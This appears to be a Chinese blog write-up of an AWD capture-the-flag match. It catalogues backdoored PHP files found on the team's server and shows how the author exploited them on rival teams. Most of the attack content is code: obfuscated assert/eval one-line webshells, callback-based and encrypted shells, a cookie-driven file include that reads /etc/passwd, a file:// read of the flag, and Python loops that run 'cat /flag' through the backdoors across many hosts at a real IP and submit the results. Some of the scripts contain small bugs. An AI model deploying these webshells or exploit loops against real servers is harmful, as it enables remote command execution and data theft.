一次AWD比赛记录

2020年10月10日 35点热度 0人点赞 0条评论

BEGIN

ssh -p 2201 ctf@118.89.227.105 

备份文件以后,首先D盾扫一波
在这里插入图片描述

使用defence上waf
在这里插入图片描述
在这里插入图片描述
开始修洞

.config_common.php

在这里插入图片描述
这是一个已知后门

<?php error_reporting(0);set_time_limit(0);a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");a(@${"_P"."O"."S"."T"}[520]); ?>
base64_decode:YXNzZXJ0
解密后:assert

可以看出是拼接了一个$_POST[520],相当于是一个一句话木马

import requests
import time

p_start = 8801
p_end = 8808
p_m = 8801

flag = []
token = '4300f7f61934925694f6138f3045e61e'

while 1:
    for i in range(p_start,p_end+1):
        if (i==p_m):
            continue
        else:
            ak_url='http://118.89.227.105:'+str(i)+'/.config_common.php'
            data={"520":"system(\'cat /flag\')"}
            re=requests.post(url=ak_url,data=data)
            flag.append(re.text)
            print(flag)

            sub_url='http://118.89.227.105:9090/'
            for i in flag:
                sub_flag={'flag':i,'token':token}
                requests.post(url=sub_url,data=sub_f)
    time.sleep(60*5)

pdd.php& 4eff2c041976ea22afb7092a53188c70.php

<?php @eval($_REQUEST["pdsdt"]);?>
<?php
eval($_POST["cmd"]);
?>

大同小异,一句话木马

import requests
import time

p_start = 8801
p_end = 8808
p_m = 8801

flag = []
token = '4300f7f61934925694f6138f3045e61e'

while 1:
    for i in range(p_start,p_end+1):
        if (i==p_m):
            continue
        else:
            ak_url='http://118.89.227.105:'+str(i)+'/uploads/4eff2c041976ea22afb7092a53188c70.php'
            data={"cmd #pass修改":"system(\'cat /flag\');"}
            re=requests.post(url=ak_url,data=data)


            flag.append(re.text)

            print(flag)

            sub_url='http://118.89.227.105:9090/'
            for i in flag:
                sub_flag={'flag':i,'token':token}
                requests.post(url=sub_url,data=sub_flag)
    time.sleep(60*5)

.111.php

<?php
pass=_POST["password"];
if(pass == "4eff2c041976ea22afb7092a53188c70")
    {
        system(_GET["getshell"]);
        readfile("/flag");
    }
else
    {
        echo "be1c5ff7101b7791469b5df2315cf75a";
    }
?>ctf@1efae1bddea7:/var/www/html/uploadscat 4eff2c041976ea22afb7092a53188c70.php 
<?php
eval(_POST["cmd"]);
?>ctf@1efae1bddea7:/var/www/html/uploadscat .111.php 
<?phppass=_POST["password"];
if(pass == "4eff2c041976ea22afb7092a53188c70")
    {
        system($_GET["getshell"]);
        readfile("/flag");
    }
else
    {
        echo "be1c5ff7101b7791469b5df2315cf75a";
    }
?>
import requests
import time

p_start = 8801
p_end = 8808
p_m = 8801

flag = []
token = '4300f7f61934925694f6138f3045e61e'

while 1:
    for i in range(p_start,p_end+1):
        if (i==p_m):
            continue
        else:
            ak_url='http://118.89.227.105:'+str(i)+'/uploads/.111.php'
            data={"pass":"4eff2c041976ea22afb7092a53188c70"}
            re=requests.post(url=ak_url,data=data)


            flag.append(re.text)

            print(flag)

            sub_url='http://118.89.227.105:9090/'
            for i in flag:
                sub_flag={'flag':i,'token':token}
                requests.post(url=sub_url,data=sub_flag)
    time.sleep(60*5)

common.css

<?php
highlight_file("/flag");
?>

一开始没有发现这个洞,可以借助ciscn_include.php执行

ciscn_config.php

<?php
echo "Mysql链接配置";
error_reporting(0);
con = mysql_connect ("127.0.0.1", "root", "c933ccc3b6b2fe8cb830a5e76f5f98a5");
if (!con){
  print('Could not connect: ' . mysqli_error());
}
mysql_select_db("ciscn_web", con);

forward_static_call_array(assert,array(_POST["x"]));
class c
{
        public code = null;
        publicdecode = null;
        function __construct()
        {       this->code='ZXZhbCgkX1BPU1RbcGFzc10pOw==';this->decode = @base64_decode( this->code );
                @Eval(this->decode);
        }

}
new c();

?>

末尾部分的代码可以看出是利用了一个回调函数,base64加密构造shell

ZXZhbCgkX1BPU1RbcGFzc10pOw==
解密后:eval($_POST[pass]);

一开始没有头绪是因为没有理清楚这段回调函数的执行

ciscn_notes.php

<?php
error_reporting(0);
session_start();
include('ciscn_config.php');

if(isset(_GET['id'])){id = mysql_real_escape_string(_GET['id']);
    if(isset(_GET['topic'])){
        topic = mysql_real_escape_string(_GET['topic']);
        topic = sprintf("AND topic='%s'",topic);
    }else{
        topic = '';
    }sql = sprintf("SELECT * FROM notes WHERE id='%s' topic",id);
    result = mysql_query(sql,con);row = mysql_fetch_array(result);
    if(isset(row['topic'])&&isset(row['substance'])){
        echo "<h1>".row['topic']."</h1><br>".row['substance'];
        die();
    }else{
        die("You're wrong!");
    }
}


class ciscn_nt {
    vara;
    var b;
    function __construct(a,b) {this->a=a;this->b=b;
    }
    function test() {
       array_map(this->a,this->b);
    }
}p1=new ciscn_nt(assert,array(_POST['x']));p1->test();
?>


<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>myblog</title>
    <link href="../css/bootstrap.min.css" rel="stylesheet">
    <script src="js/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
</head>
<body>
<nav class="navbar navbar-default" role="navigation">
    <div class="navbar-header">
        <a class="navbar-brand" href="#">Blog</a>
    </div>
    <div>
        <ul class="nav navbar-nav">
            <li class="active"><a href="#">笔记</a></li>
            <li><a href="#">关于</a></li>
        </ul>
    </div></nav>
<div class="panel panel-success">
    <div class="panel-heading">
        <h1 class="panel-title">php是世界上最好的语言</h1>
    </div>
    <div class="panel-body">
        <li><a href='ciscn_notes.php?id=1&topic=Welcome to PHP world'>Welcome to PHP world</a><br></li>
        <li><a href='ciscn_notes.php?id=2&topic=Do the best you can'>Do the best you can</a><br></li>
        <li><a href='ciscn_notes.php?id=3&topic=Attention, please.'>格式化,全都格式化。。。</a><br></li>
    </div>
</div>
</body>


<!--mysql_real_escape_string()-->
<!--topic = sprintf("AND topic='%s'",topic);-->
<!--sql = sprintf("SELECT * FROM notes WHERE id='%s'topic", $id)-->
</html>

主要利用在这一段代码

class ciscn_nt {
    var a;
    varb;
    function __construct(a,b) {
        this->a=a;
        this->b=b;
    }
    function test() {
       array_map(this->a,this->b);
    }
}
p1=new ciscn_nt(assert,array(_POST['x']));
$p1->test();
?>

主要实现了

<?php assert($_POST['x']);?>

这又是使用了一个回调函数,使test()函数触发array_map(),在最开始是变量\a和\$b在\$p1分别被定义了assert和_POST['x']

ciscn_include.php

<?php 
cookie=_COOKIE["cookie"];
@error_reporting(0);
session_start();

if (_SERVER['REQUEST_METHOD'] === 'POST')
{key="e45e329feb5d925b"; 
    _SESSION['k']=key;
    post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {t="base64_"."decode";
        post=t(post."");

        for(i=0;i<strlen(post);i++) {post[i] =post[i]^key[i+1&15];                }
    }
    else
    {post=openssl_decrypt(post, "AES128",key);
    }
    arr=explode('|',post);
    func=arr[0];
    params=arr[1];
    class C{public function __invoke(p) {eval(p."");}}
    @call_user_func(new C(),params);
}
include(cookie);
?>

第一行

$cookie=$_COOKIE["cookie"];

最后一行

include($cookie);

cookie中包含了一个变量(cookie)

headers = "Cookie":"cookie=/etc/passwd"
url = "/blog/ciscn_include.php"
re = requests.get(url=ip+url,headers=headers)

ciscn_url.php

<?php
url =_GET['url'];
parts = parse_url(url);
if(empty(parts['host']) ||parts['host'] != 'localhost') {
    exit('error');
}
readfile($url);
?>

这里存在一个readfile()可以读取flag

?url=file://localhost/flag #使用file协议

luoluo

我爱吃螺蛳粉

文章评论